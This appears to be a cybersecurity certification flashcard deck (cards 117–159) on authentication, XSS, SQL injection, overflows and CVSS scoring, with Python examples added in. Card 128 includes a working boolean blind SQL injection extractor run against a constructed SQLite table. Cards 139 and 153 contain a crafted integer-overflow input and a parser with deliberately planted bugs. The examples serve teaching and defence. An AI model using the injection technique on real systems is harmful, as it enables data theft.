Spoofing identities
Tampering with data
Repudiation
Information disclosure
Denial of service
Elevation of privilege

117
Q

Which mechanism validates that the user or entity is who they claim to be?

A)Session management
B)Output encoding
C)Authentication
D)Input validation
E)Authorization

A

Authentication is the mechanism that validates that the user or entity is who they claim to be. Authentication can be accomplished through a username/password combination, multi-factor authentication (where more than one piece of identifying information is necessary), or through cryptographic authentication, where the user is in possession of a key that is generated through a cryptographic algorithm.

118
Q

What is the process of identifying IoT and other devices that are not part of the core infrastructure so that hackers cannot use them to compromise an organization’s core network?

A)Penetration testing and adversary emulation
B)Security controls testing
C)Passive discovery
D)Edge discovery

A

Edge discovery is the process of identifying Internet of Things (IoT) and other devices that are not part of the core infrastructure. Once identified, they can be configured so that hackers cannot use them to compromise an organization’s core network.

Edge discovery is a key component of edge security for attack surface management. Edge security is the process of securing nodes that are outside a company’s network core. The edge of the network needs the same level of security as the core network. Nodes at the edge are not fully covered by the security perimeter of the organization and so are the most vulnerable to cybersecurity risks. Computing on the edge involves computing occurring closer to edge devices rather than the infrastructure of the network. Self-driving cars, sensors, fitness bands, and IoT devices are examples of edge devices. These devices often handle sensitive data, and their compromise can compromise the full network. For this reason, it is essential that these devices are not discoverable by hackers on the Internet. Physical controls involve securing the devices and only allowing authorized personnel to use them. Logical controls involve encryption of device data both in transit and at rest and implementing authorization and authentication.

119
Q

What are the best practices for EDGE security?

A

The growth in the use of edge devices has increased the attack surface for an organization. To secure edge devices, you use routers and firewalls as well as wide area network (WAN) devices which are built for security. Some best practices for edge security include:

Keep a zero-trust model throughout the company
Ensure internal configuration and control of edge devices and reject compromised devices
Use AI and ML tools to monitor edge device activity
Ensure edge devices are isolated in a public cloud to avoid discovery

120
Q

Passive discovery helps with?

A

Passive discovery helps to protect the network through the use of security appliances, including firewalls, intrusion detection systems (IDSes), intrusion prevention systems (IPSes), malware protection systems, and others. It is the role of these systems to monitor events and, when an event occurs, create an alert for humans to intervene.

121
Q

Which of the following describes a recurring period when patches and configuration changes are performed?

A)Service level objectives
B)Maintenance window
C)Maintenance exclusion
D)Escalation

A

A maintenance window is a recurring period during which patches and configuration changes (maintenance) are performed. These maintenance windows are typically used for automatic patch deployment and configuration changes. When scheduling a maintenance window, it is important to consider the impact of downtime to the organization, customers, and operations.

122
Q

As part of your company’s comprehensive vulnerability scanning policy, you decide to perform a passive vulnerability scan on one of your company’s subnetworks. Which statement is TRUE of this scan?

A)It impacts the hosts and network less than other scan types.

B)It includes the appropriate permissions for the different data types.

C)It is limited to a particular operating system.

D)It allows a more in-depth analysis than other scan types.

A

A passive scan impacts the hosts and network less than other scan types. It does not provide more information. To perform a more in-depth analysis than other scan types, you would perform an active scan.

123
Q

You are examining a server that has undergone a SQL injection attack. Which server is most likely the victim of this attack?

A)File server
B)Database server
C)Web server
D)Email server

A

A database server is most likely the victim in a SQL injection attack. A SQL injection attack inserts a SQL query as the input from the client to the application. The purpose of this attack is to read sensitive data from the database, modify the data, execute administrative operations on the database, recover the content of a given file, and even issue commands to the operating system.

124
Q

what attack would a web server experience?

A

The web server is usually the means whereby the SQL injection attack is delivered, but it is not really the victim of the attack. A web server is most likely the victim of cross-site scripting (XSS) and cross-site request forgery (CSRF) attacks.

125
Q

Your company has a login page that suddenly displays an alert box saying this site has been attacked. You refresh the webpage over and over again, but it is still there. What kind of attack is this?

A)Reflected XSS
B)Stored XSS
C)DOM-based XSS
D)Blind SQL injection

A

Stored cross-site scripting (XSS), or persistent XSS, is what is happening here. It occurs when someone has embedded malicious code into the site that runs every time someone accesses that page. The attacker usually submits the payload through a login form, message board, comment field, or some other type of input that the site stores and later renders without encoding. In this case, someone posted JavaScript into an input field, and that script now runs whenever the page is loaded. It is a simple way to deface a site.

126
Q

Reflected XSS Attack?

A

This is not a reflected XSS attack. A reflected XSS attack occurs when malicious script supplied in a request (typically via a crafted link) is echoed back by the vulnerable site in a single HTTP response and executes in the victim's browser; the payload is never stored on the server, so only users who follow the link are affected. This did not happen in the above scenario, as the website itself was persistently defaced.

127
Q

DOM-based XSS?

A

Document Object Model (DOM)-based XSS is an injection in which the site's own client-side script writes attacker-controlled data (for example, from the URL fragment) into the DOM unsafely, so the client-side code runs in an "unexpected" manner. The payload never needs to reach the server. Again, this is not the issue being described, because the defacement is stored on the site itself rather than introduced through the victim's browser.

128
Q

Blind SQL Injection?

A

According to OWASP a “Blind Structured Query Language (SQL) injection is a type of SQL injection attack that asks the database true or false questions and then determines the answer based on the web application’s response. This attack is often used when the web application is configured to show generic error messages but has not mitigated the code that is vulnerable to SQL injection.”
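The following Python is an added example and is not part of the original flashcard deck or OWASP's text. It builds a constructed in-memory SQLite table, exposes a constructed lookup that concatenates user input into SQL and answers only yes/no (the "generic response" that makes the injection blind), and recovers a stored value one character at a time by asking the database true/false questions. The same extractor is run against a parameterized version of the lookup to show that bound parameters defeat it.

```python
"""Boolean-based blind SQL injection beside the parameterized fix.

Added example, not from the flashcard deck. The schema, rows, endpoint names
and charset are constructed for illustration; SQLite in memory keeps it offline.
"""
import sqlite3

# Constructed search alphabet; real tooling uses binary search over the full byte range.
CHARSET = "abcdefghijklmnopqrstuvwxyz0123456789"


def build_db():
    """Constructed users table with two rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users (username, password) VALUES (?, ?)",
                     [("admin", "s3cret"), ("alice", "hunter2")])
    conn.commit()
    return conn


def user_exists_vulnerable(conn, username):
    """Constructed vulnerable endpoint: untrusted input is concatenated into SQL.
    It answers only True/False and swallows errors, so an attacker gets no data
    back directly and must infer it one question at a time."""
    sql = "SELECT id FROM users WHERE username = '" + username + "'"
    try:
        return conn.execute(sql).fetchone() is not None
    except sqlite3.Error:
        return False


def user_exists_safe(conn, username):
    """Same lookup with a bound parameter: the input is data, never SQL."""
    row = conn.execute("SELECT id FROM users WHERE username = ?", (username,)).fetchone()
    return row is not None


def blind_extract(oracle, column, target_user, max_len=32):
    """Recover one column value for target_user by asking the oracle yes/no
    questions about each character position, as OWASP describes for blind SQLi.
    oracle(username) must return True when the injected condition holds."""
    recovered = ""
    for pos in range(1, max_len + 1):
        for ch in CHARSET:
            # Valid row AND one-character comparison; "-- " comments out the closing quote.
            probe = (f"{target_user}' AND substr((SELECT {column} FROM users "
                     f"WHERE username='{target_user}'),{pos},1)='{ch}'-- ")
            if oracle(probe):
                recovered += ch
                break
        else:
            return recovered  # no character matched: end of value (or outside CHARSET)
    return recovered


if __name__ == "__main__":
    conn = build_db()
    print("vulnerable:", blind_extract(lambda u: user_exists_vulnerable(conn, u), "password", "admin"))
    print("parameterized:", repr(blind_extract(lambda u: user_exists_safe(conn, u), "password", "admin")))
```

Each recovered character costs up to len(CHARSET) requests here; real attack tooling halves that repeatedly by comparing unicode() of the character against a midpoint. Against the parameterized lookup every probe is just a username that does not exist, so nothing is recovered.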

129
Q

Your organization has implemented an AWS cloud environment. Which of the following is an exploitation framework specifically designed for cloud environments?

A)Pacu
B)GNU Debugger
C)Angry IP
D)Recon-ng

A

Pacu is a cloud penetration-testing tool that can, like other exploitation frameworks, automate some of the more common attacks. It is designed for AWS deployments.

130
Q

You would like to use a proxy to analyze API requests and responses to your web server. Which of the following tools would be best suited for this?

A)Zenmap
B)Nikto
C)Burp Suite
D)Nessus

A

You can use Burp Suite to capture and analyze API requests and responses in an act of reconnaissance. Burp Suite is a collection of web application security tools that includes proxy capabilities and mobile application testing to determine communication with application programming interfaces (APIs) and to discover vulnerabilities in web apps.

131
Q

Which of the following protects against cross-site injection attacks by creating a token?

A)Authentication
B)Output encoding
C)Data protection
D)Session management

A

Session management protects against cross-site request forgery (CSRF) by issuing an anti-forgery token bound to the session. This is accomplished through the creation of a session identifier (session ID) that is exchanged between the user and the web application, together with a token that a cross-site request cannot supply. Session IDs should carry at least 128 bits of entropy from a cryptographically secure random number generator to prevent guessing or brute-force attacks.
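The following Python is an added example and is not part of the original flashcard deck. It shows the two properties the card above describes: a session ID with 128 bits of entropy drawn from the operating system's CSPRNG, and a per-session anti-forgery token (synchronizer-token pattern) that a cross-site request cannot forge because it is an HMAC over the session ID under a server-only key. The server secret, the cookie and form-field names, and the simulated request handler are constructed for the example.

```python
"""Session ID generation and CSRF token binding.

Added example, not from the flashcard deck. SERVER_SECRET, the "session"
cookie name and the "csrf" form field are constructed for illustration.
"""
import hashlib
import hmac
import secrets

SESSION_ID_BYTES = 16                     # 16 bytes = 128 bits, the minimum the card cites
SERVER_SECRET = secrets.token_bytes(32)   # constructed; in practice stored and rotated securely


def new_session_id():
    """Fresh session ID from the OS CSPRNG, hex encoded (32 characters)."""
    return secrets.token_bytes(SESSION_ID_BYTES).hex()


def csrf_token(session_id, secret=SERVER_SECRET):
    """Anti-forgery token bound to one session. An attacker who can make the
    victim's browser send a request does not know the secret, so they cannot
    compute the token the server expects for that session."""
    return hmac.new(secret, session_id.encode(), hashlib.sha256).hexdigest()


def verify_csrf(session_id, presented, secret=SERVER_SECRET):
    """Constant-time comparison of the token submitted in a form field or header."""
    expected = csrf_token(session_id, secret)
    return hmac.compare_digest(expected, presented)


def handle_state_change(cookies, form, secret=SERVER_SECRET):
    """Simulated handler for a state-changing POST. Returns (status, body).
    A cross-site form post carries the session cookie but not the token."""
    sid = cookies.get("session")
    if sid is None:
        return 401, "no session"
    if not verify_csrf(sid, form.get("csrf", ""), secret):
        return 403, "csrf token missing or invalid"
    return 200, "ok"


if __name__ == "__main__":
    sid = new_session_id()
    tok = csrf_token(sid)
    print("session:", sid)
    print("legit post:", handle_state_change({"session": sid}, {"csrf": tok}))
    print("cross-site post:", handle_state_change({"session": sid}, {}))
```

The token is derived rather than stored, so the server keeps no extra state per session; if the session ID is rotated at login, the old token stops validating automatically.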

132
Q

XSS vs SQL injections

A

The main difference between a SQL injection and an XSS attack is that SQL injection attacks are used to read or modify information in databases, whereas XSS attacks run attacker-controlled script in the victim's browser to steal session cookies, redirect users to attacker-controlled sites, or deface pages. SQL injection is database focused, whereas XSS is geared towards attacking end users.

133
Q

An attacker was able to hack into the POS system of a retail store and refund a large amount into their bank account. Which service method was most likely used by the broken access control allowing unauthorized access to the POS system?

A)FTP service
B)OS version
C)SNMP service
D)POS application

A

The Simple Network Management Protocol (SNMP) service may be abused to gain unauthorized access to network devices. It provides a standardized framework for a common language that is used for monitoring and managing devices in a network.

The File Transfer Protocol (FTP) service is not normally applicable to a retail setting. FTP is used to transfer files between servers and workstations. It can be vulnerable, though.

A point-of-sale (POS) application would only check for the application version vulnerability. It is not a way to hack in and of itself as it is just enumeration.

The operating system (OS) version enumerates OS version details and verifies for any vulnerabilities. Again, this is just enumeration, not a way to hack in.

134
Q

Your organization just completed the purchase of a supplier. Now the cybersecurity team is assessing the new subsidiary to ensure they can support the parent company’s defense-in-depth strategy. Which of the following is NOT a technology consideration?

A)Security appliances
B)Succession planning
C)Security suites
D)Automated reporting capabilities

A

Succession planning does support a defense-in-depth strategy. It is a personnel consideration, not a technological one.

135
Q

Technical considerations that contribute to defense-in-depth strategy include:

A

Automated reporting capabilities – can be scheduled to be delivered to the proper individual in the organization when generated. A variety of report types are available and are tailored for the audience to which they are directed.

Security appliances – hardware devices that are designed to provide some function that supports the securing of the network or detecting vulnerabilities and attacks.

Security suites – collections of security utilities combined into a single tool.

Outsourcing of security services – security services provided by third parties with more talent and experience than may exist in the organization.

Cryptography services – supporting the three core principles of the confidentiality, integrity, and availability (CIA) triad, cryptosystems also directly provide authentication, confidentiality, integrity, authorization, and non-repudiation.

Other personnel issues that support a defense-in-depth strategy include:

Security training
Dual control
Separation of duties
Proper securing of third party/consultants
Cross training
Mandatory vacation

136
Q

Which of the following would be exemplified by checking to see if an application block list prevents the installation of a particular executable file?

A)Bug bounty
B)Penetration testing and adversary emulation
C)Passive discovery
D)Security controls testing

A

Checking to see if an application block list prevents the installation of a particular executable file would be an example of security controls testing. Security controls testing determines if controls have been properly implemented, performing as expected and producing the appropriate results.

137
Q

Your company implements an industrial control system (ICS). This ICS will connect to two networks, the company network and the control system network. The ICS should transmit only invoicing and billing information on the company network, and the control system network should transmit all ICS-related communication. When constructing such a system, which of the following design concepts would best protect the business and the operations?

A)Use a standard layered approach to secure the ICS.

B)Air-gap the two networks.

C)Include a firewall between the company network and the ICS.

D)Implement secure booting.

A

To best protect the business and the operations, the company should use a standard layered approach to secure the ICS. Because there are many attack vectors, no one security measure would be sufficient. Attack vectors may include digital attacks from the outside seeking to steal financial information or disrupt the system’s operations, insider errors, malicious insiders, or physical attacks or disruptions. Layered security includes the usual hardware and software additions to provide mitigation against known attacks, and adds employee security awareness training for additional protection.

138
Q

Which of the following attacks involves analyzing the compiled mobile app or system data to extract source code information to be used in understanding and potentially manipulating the underlying architecture of the mobile application or operating system?

A)Spamming
B)Over-reaching permissions
C)Reverse engineering
D)Sandbox analysis

A

Reverse engineering involves analyzing the compiled mobile app or system data to extract source code information to be used in understanding and potentially manipulating the underlying architecture of the mobile application or operating system. Attackers use reverse engineering techniques to compromise the OS of a mobile device (e.g., Android, Apple iOS) to root or jailbreak it (gain unrestricted access to the entire root of the OS).

139
Q

For which of the following overflow types can the likelihood of a compromise be greatly reduced with input validation?

A)For integer overflow only
B)For heap overflow only
C)For buffer overflow only
D)For all of these overflow types
E)For stack overflow only

A

An overflow attack supplies more data than the program allocated to hold it. A buffer is a memory allocation that is designed to hold a finite amount of data. In other words, the attacker attempts to write more data into an application's pre-built buffer than that buffer was intended to hold. When an attacker can add data that exceeds the buffer limits, the extra information spills over past the buffer into adjacent memory, where it can crash the program or, if the attacker controls what is overwritten, redirect execution to malicious code.

All types of overflows can be reduced by examining all input prior to accepting it. The input can be examined to ensure it has the correct length and that no malicious character types are present.
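
The length and bounds checks described above, as an added example that is not part of the original card. The frame format (a 32-bit offset, a 32-bit length, then the payload) and the 64-byte buffer size are constructed for illustration. The point is that the naive C-style check offset + length <= BUF_SIZE can be defeated by an integer wrap, which is how an integer overflow turns into a buffer overflow, and that checking the remaining room instead closes both.

```python
import struct

BUF_SIZE = 64                 # size of the fixed receive buffer the parser must never exceed
U32_MASK = 0xFFFFFFFF


def u32_add(a: int, b: int) -> int:
    """Emulate C unsigned 32-bit addition: the sum wraps around at 2**32."""
    return (a + b) & U32_MASK


def bounds_ok_naive(offset: int, length: int) -> bool:
    """The check as it is often written in C: `if (offset + length <= BUF_SIZE)`.
    A huge length makes the sum wrap to a small number, so the check passes."""
    return u32_add(offset, length) <= BUF_SIZE


def bounds_ok_safe(offset: int, length: int) -> bool:
    """Overflow-proof form: compare against the remaining room instead of adding."""
    return offset <= BUF_SIZE and length <= BUF_SIZE - offset


def parse_frame(frame: bytes) -> dict:
    """Parse a constructed frame: u32 offset, u32 length, then `length` payload bytes.
    Every field is validated before it is used to size or index anything."""
    if len(frame) < 8:
        raise ValueError("frame shorter than its 8-byte header")
    offset, length = struct.unpack_from("<II", frame, 0)
    payload = frame[8:]
    if not bounds_ok_safe(offset, length):
        raise ValueError(f"offset {offset} + length {length} exceeds {BUF_SIZE}-byte buffer")
    if len(payload) != length:
        raise ValueError("declared length does not match payload length")
    if any(b < 0x20 or b > 0x7E for b in payload):
        raise ValueError("payload contains non-printable bytes")
    return {"offset": offset, "length": length, "payload": payload.decode("ascii")}


def build_frame(offset: int, payload: bytes) -> bytes:
    """Build a well-formed frame for the given payload."""
    return struct.pack("<II", offset, len(payload)) + payload


def crafted_frame() -> bytes:
    """Attacker input: the length is chosen so offset + length wraps to 8 in 32-bit math,
    slipping past the naive check while describing gigabytes of payload."""
    return struct.pack("<II", 16, 0xFFFFFFF8) + b"A" * 8


def rejects(frame: bytes) -> bool:
    """True if parse_frame refuses the frame with a ValueError."""
    try:
        parse_frame(frame)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    print("naive check accepts crafted frame:", bounds_ok_naive(16, 0xFFFFFFF8))
    print("safe check accepts crafted frame:", bounds_ok_safe(16, 0xFFFFFFF8))
    print(parse_frame(build_frame(4, b"hello")))
```

Run it and the naive check accepts the crafted frame because 16 + 0xFFFFFFF8 wraps to 8, while the safe check rejects it. Porting the same length <= BUF_SIZE - offset form back into the C parser is the actual fix; the printable-character check is the "no malicious character types" half of the card's advice.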

140
Q

Buffer overflow?

A

occurs when more data is written to a memory allocation that is designed to hold a finite amount of data than it was sized to hold, so the excess spills into adjacent memory.

141
Q

Heap overflow?

A

occurs when more data is written to a part of memory dynamically allocated at runtime (the heap, which typically holds program data) than the allocation was sized to hold.

142
Q

Stack overflow?

A

occurs when more data is written to the stack, the part of memory that stores a function's local variables, the parameters passed to it and its return address, than the allocated space can hold; overwriting the return address is what lets an attacker hijack execution.

143
Q

Integer overflow?

A

occurs when a mathematical operation attempts to create a numerical value that is too large for the available storage space.

144
Q

Which of the following are MANDATORY components of the CVSS 3.1 base score calculations? (Choose three.)

A)Impact score
B)Temporal score
C)Environmental score
D)Exploitability score
E)Impact sub score

A

The Temporal score and the Environmental score are not MANDATORY components of the Common Vulnerability Scoring System (CVSS) Base Score in CVSS v3.1. The Base Score formula depends on sub-formulas for the Impact Sub-Score (ISS), Impact, and Exploitability, all of which are defined below:

The Impact Sub Score (ISS) is calculated as follows:

ISS = 1 − [(1 − Confidentiality) × (1 − Integrity) × (1 − Availability)]

The Impact Score is calculated as follows:

If Scope is unchanged: Impact = 6.42 × ISS
If Scope is changed: Impact = 7.52 × (ISS − 0.029) − 3.25 × (ISS − 0.02)^15

The Exploitability Score is calculated as follows:

Exploitability = 8.22 × AttackVector × AttackComplexity × PrivilegesRequired × UserInteraction

(The PrivilegesRequired weight depends on Scope: Low is 0.62 when Scope is unchanged and 0.68 when changed; High is 0.27 unchanged and 0.50 changed.)

The Base Score is then calculated as follows:
If Impact <= 0, then 0, else:
If Scope is unchanged: Roundup(Minimum[(Impact + Exploitability), 10])
If Scope is changed: Roundup(Minimum[1.08 × (Impact + Exploitability), 10])

Roundup returns the smallest number, to one decimal place, that is equal to or greater than its input (so 4.71 becomes 4.8).

The Temporal Score, while not a mandatory component, is calculated as follows:
Roundup(BaseScore × ExploitCodeMaturity × RemediationLevel × ReportConfidence)

The Environmental Score, while not a mandatory component, is calculated as follows:
If ModifiedImpact <= 0, then 0, else:
If ModifiedScope is unchanged:
Roundup(Roundup[Minimum([ModifiedImpact + ModifiedExploitability], 10)] × ExploitCodeMaturity × RemediationLevel × ReportConfidence)
If ModifiedScope is changed:
Roundup(Roundup[Minimum(1.08 × [ModifiedImpact + ModifiedExploitability], 10)] × ExploitCodeMaturity × RemediationLevel × ReportConfidence)

For contrast, the older CVSS v2 formulas, which some scanners still report alongside v3.x, are:

Impact = 10.41 × (1 − (1 − ConfImpact) × (1 − IntegImpact) × (1 − AvailImpact))
Exploitability = 20 × AccessVector × AccessComplexity × Authentication
f(Impact) = 0 if Impact is 0, otherwise 1.176
BaseScore = round to one decimal of (((0.6 × Impact) + (0.4 × Exploitability) − 1.5) × f(Impact))

Most vulnerability scanners provide the CVSS Base Score along with a breakdown of the individual rankings of the eight v3.1 base metrics (AV, AC, PR, UI, S, C, I, A).

145
Q

Troy is analyzing the results of a vulnerability scan and is examining a vulnerability detected on one of his servers that has a CVSS v3 breakdown as follows:

CVSS3#AV:A/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L

Which one of the following statements is FALSE about this vulnerability?

A)Exploiting the vulnerability requires either physical access to the target or a local (shell) account on the target.
B)Exploiting this vulnerability would not require authentication.

C)Exploiting this vulnerability requires somewhat
specialized access conditions.

D)Exploiting this vulnerability would result in reduced performance or interruptions in resource availability.

A

Exploiting the vulnerability does NOT require either physical access to the target or a local (shell) account on the target. The Attack Vector (AV) metric, called Access Vector in CVSS v2, has a value of A, which stands for Adjacent Network. This means that exploiting the vulnerability requires access to the local network of the target (the same broadcast domain or a logically adjacent network), not access to the target itself.

146
Q

The Attack Vector (AV) metric describes how the attacker would exploit the vulnerability. AV is an Exploitability metric in the Base metric group. It has four possible values:

A

P – stands for Physical and means the attacker must physically touch the vulnerable component to carry out the attack

L – stands for Local and means the attacker must have physical or logical access to the affected system itself

A – stands for Adjacent network and means the attacker must be on a logically adjacent network (such as the local IP subnet) or the same physical network

N – stands for Network and means the attacker can use the vulnerability from any network location on the Internet

147
Q

Bob is analyzing the results of a vulnerability scan. He examines a vulnerability detected on one of his servers that has a CVSS breakdown as follows:

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N

This attack requires that a user on the server install some software. Which base metric indicates that this is the case?

A)PR
B)AV
C)UI
D)AC

A

The User Interaction (UI) base metric is used to indicate whether or not the attacker requires a human user to do anything for the attack to succeed, such as installing software.

148
Q

One member of the web application security team has expressed an interest in pursuing the GIAC certification. Which organization sponsors this certification?

A)ISO
B)CIS
C)SANS
D)OWASP

A

The SysAdmin, Audit, Network, and Security (SANS) organization sponsors the Global Information Assurance Certification (GIAC). They also provide training, perform research, and publish best practices for cybersecurity, web security, and application security. They provide guidelines for secure software development.

149
Q

A security analyst was provided with a detailed report of a penetration test that was performed against the organization’s resources. It was noted on the report that a vulnerability on a file server has the following detailed CVSS 3.1 vector:

CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N

Which metric group in this vector should be of the highest concern to the security analyst?

A)Integrity
B)Attack Vector
C)Confidentiality
D)Availability

A

Of the options listed, the security analyst should be most concerned with the Confidentiality or C metric because it is rated as H, or High. This means that there would be a total loss of confidentiality, resulting in all resources within the impacted component being divulged to the attacker.

Though it was not listed as an option, the Attack Complexity (AC) value is L (Low), which is the worst possible value for this metric and also a matter of high concern.

The CVSS vector CVSS:3.1/AV:P/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N specifies eight base metrics:

Attack Vector (Physical)
Attack Complexity (Low)
Privileges Required (High)
User Interaction (Required)
Scope (Unchanged)
Confidentiality (High)
Integrity (Low)
Availability (None)

150
Q

Laura is operating from her home network. After she accesses a company website, she calls the IT department claiming that she is being presented with a defaced website with suspicious-looking content. Upon investigation of the website, the IT department sees no issues, and a log review shows that no files have been changed. Which of the following answers might explain the cause?

A)ARP poisoning
B)MAC spoofing
C)SQL injection
D)DNS poisoning

A

DNS cache poisoning is the act of entering false information into a DNS cache so that DNS queries return an incorrect response and users are directed to the wrong website. This attack is also known as DNS spoofing. Because the IT department is not seeing the same things that the user is, it is likely that the user’s DNS cache has been poisoned and her session is being redirected to a different website.

151
Q

After executing a dynamic vulnerability scan of some code developed in-house using a public code repository, the team is considering following up with a static scan. Which of the following statements is FALSE with respect to static and dynamic code analysis?

A)OWASP ZAP is a dynamic tool

B)dynamic scans are performed while the software is running

C)dynamic analysis involves manually examining the code

D)fuzz testing is a form of dynamic analysis

A

Dynamic scans do not involve manually examining the code; that is static analysis.

152
Q

Now that security requirements have been defined, the software development team is ready to start the security testing phase. They want to analyze the code without the code executing and plan to repeat this testing throughout the entire application development life cycle. What type of testing are they planning?

A)Static code analysis

B)Web application vulnerability scanning

C)Use interception proxy to crawl application

D)Fuzzing

A

Static code analysis is performed without the code executing. Code review and testing must occur throughout the entire application development life cycle. Code review and testing must identify bad programming patterns, security misconfigurations, functional bugs, and logic flaws.

153
Q

Fuzzing

A

Fuzz testing, or fuzzing, involves injecting invalid or unexpected input (sometimes called faults) into an application to test how the application reacts. It is usually done with a software tool that automates the process.
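
The fuzzing loop described above, as an added example that is not part of the original card. parse_header is a constructed toy parser with two deliberately planted crashes (a bare ValueError and a KeyError), not code from any real product. The harness shows the parts a practitioner actually builds: a seed input, mutation operators, a fixed random seed so every finding is reproducible, and an oracle that distinguishes the parser's documented rejection (ParseError) from an unexpected exception.

```python
import random


class ParseError(Exception):
    """The only exception parse_header is documented to raise on bad input."""


def parse_header(data: bytes) -> dict:
    """Constructed target: parses 'VER:<n>;LEN:<n>;BODY:<text>'.
    Two crashes are planted on purpose so the harness has something to find."""
    try:
        text = data.decode("ascii")
    except UnicodeDecodeError:
        raise ParseError("non-ASCII byte") from None
    fields = {}
    for part in text.split(";"):
        name, value = part.split(":", 1)      # planted bug: bare ValueError when ':' is missing
        fields[name] = value
    try:
        length = int(fields["LEN"])            # planted bug: KeyError when LEN is missing
    except ValueError:
        raise ParseError("LEN is not an integer") from None
    body = fields["BODY"]                      # planted bug: KeyError when BODY is missing
    if len(body) != length:
        raise ParseError("LEN does not match BODY")
    return {"version": fields.get("VER"), "length": length, "body": body}


SEED = b"VER:1;LEN:5;BODY:hello"             # a valid input to mutate from


def mutate(rng: random.Random, data: bytes) -> bytes:
    """Apply one random mutation: bit flip, byte overwrite, byte delete, or delimiter insert."""
    buf = bytearray(data)
    op = rng.randrange(4)
    if op == 0 and buf:
        buf[rng.randrange(len(buf))] ^= 1 << rng.randrange(8)
    elif op == 1 and buf:
        buf[rng.randrange(len(buf))] = rng.randrange(256)
    elif op == 2 and buf:
        del buf[rng.randrange(len(buf))]
    else:
        buf.insert(rng.randrange(len(buf) + 1), rng.choice(b";:\x00\xff"))
    return bytes(buf)


def fuzz(target, seed: bytes, iterations: int, rng_seed: int = 1) -> dict:
    """Run mutated inputs through target. Documented rejections (ParseError) are fine; any other
    exception is recorded, keyed by exception type, with the first input that triggered it."""
    rng = random.Random(rng_seed)          # fixed seed: the same findings every run
    findings = {}
    for _ in range(iterations):
        case = mutate(rng, seed)
        try:
            target(case)
        except ParseError:
            continue                       # correct rejection, not a bug
        except Exception as exc:           # unexpected crash: a bug in the target
            findings.setdefault(type(exc).__name__, case)
    return findings


if __name__ == "__main__":
    for kind, case in fuzz(parse_header, SEED, 500).items():
        print(f"{kind}: {case!r}")
```

Real fuzzers (AFL++, libFuzzer, Atheris for Python) add coverage feedback so that mutations reaching new code are kept as fresh seeds, but the oracle question is the same: decide up front what a correct rejection looks like, so that everything else counts as a crash worth triaging.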

154
Q

Interception Proxy

A

An interception proxy is an application that stands between the web server and the client and passes all requests and responses back and forth. While it does so, it analyzes the information to test the security of the web application. A web application proxy can also “crawl” the site and its application to discover the links and content contained.

155
Q

Before executing a vulnerability scan, you are evaluating all relevant considerations. Which of the following considerations should be addressed with subnetting?

A)sensitivity levels
B)segmentation
C)performance
D)regulatory requirements

A

Segmentation considerations are made to control which sections of the network are scanned. This technique supports ensuring that operations and productivity are not negatively impacted by the scan and that any machines exempted from the scan are not scanned. Segmentation can be accomplished with subnetting and ACLs on the routers to prevent the scan from accessing exempted systems.

156
Q

Sensitivity levels of a vulnerability scan?

A

Sensitivity level considerations involve determining how deeply the machines are scanned and are addressed by choosing an appropriate scan type. For example, a credentialed scan will scan more deeply and render more valuable information than an uncredentialed scan, but it will also impact the machine’s performance and create more network traffic.

157
Q

Bob is analyzing the results of a vulnerability scan. He examines a vulnerability detected on one of his servers that has a CVSS breakdown as follows:

CVSS:3.1/AV:L/AC:L/PR:H/UI:R/S:U/C:H/I:L/A:N

Which metric describes whether the issue can be spread among other systems?

A)AV
B)S
C)UI
D)PR

A

The Scope (S) metric is a determination as to whether a vulnerability in one component can have carry-over impact on resources managed by a different security authority. It has two possible values:

Changed (C) – An exploited vulnerability can affect resources beyond the security scope of the vulnerable component (for example, escaping a sandbox or a virtual machine).

Unchanged (U) – An exploited vulnerability can only affect resources managed by the same security authority as the vulnerable component.

In this example, the S:U score indicates the vulnerability is limited in scope to the affected component. This is the lower-risk value.

The User Interaction (UI) base metric is used to indicate whether or not a user other than the attacker must do anything for the attack to succeed. The UI metric has two possible values:

None (N) – No user interaction is required.

Required (R) – A user must complete some steps for the exploit to succeed. For example, a user might be required to install some software.

The Attack Vector (AV) base metric describes how the attacker would exploit the vulnerability. It has four possible values:

L – stands for Local and means the attacker must have physical or logical access to the affected system.

A – stands for Adjacent network and means the attacker must be on the local network.

N – stands for Network and means the attacker can exploit the vulnerability remotely from any network.

P – stands for Physical and requires the attacker to physically touch the device.

Called Authentication in earlier versions of CVSS, the Privileges Required (PR) metric describes the level of access required to mount this attack. There are three possible values:

None (N): The attacker does not need any privileges to exploit the vulnerability.

Low (L): The attacker is required to have basic user privileges on the system to exploit the vulnerability.

High (H): The attacker has to have administrative or otherwise elevated privileges on the system to exploit the vulnerability. Needing higher privileges may seem contradictory for a vulnerability, but the vulnerable component and the impacted component may be different.

158
Q

Barb is analyzing the results of a vulnerability scan. She examines a vulnerability detected on one of the servers that has a CVSS breakdown as follows:

CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:N

What are the privileges required to mount this attack?

A)The attacker does not need any privileges to exploit the vulnerability.

B)The attacker must be physically present to exploit the vulnerability.

C)The attacker is required to have basic privileges in the system to exploit the vulnerability.

D)The attacker has to have higher privileges in a system to exploit the vulnerability.

A

The attacker is required to have basic privileges in the system to exploit the vulnerability. Called Authentication in earlier versions of CVSS, the Privileges Required (PR) metric describes the level of access required to mount this attack. There are three possible values:

None (N): The attacker does not need any privileges to exploit the vulnerability.
Low (L): The attacker is required to have basic privileges in a system to exploit the vulnerability.
High (H): The attacker has to have administrative or otherwise elevated privileges on the system to exploit the vulnerability. Needing higher privileges may seem contradictory for a vulnerability, but the vulnerable component and the impacted component may be different.

Whether the attacker needs to be physically present or not is not described by the PR metric. The Attack Vector (AV) metric describes how the attacker would exploit the vulnerability. AV is an Exploitability metric in the Base metric group. It has four possible values:

P – stands for Physical and means the attacker must physically touch the vulnerable component to carry out the attack
L – stands for Local and means the attacker must have physical or logical access to the affected system itself
A – stands for Adjacent network and means the attacker must be on a logically adjacent network (such as the local IP subnet) or the same physical network
N – stands for Network and means the attacker can use the vulnerability from any network location on the Internet

For this metric, P carries the lowest exploitability weight (least concern for the defender) and N the highest.

159
Q

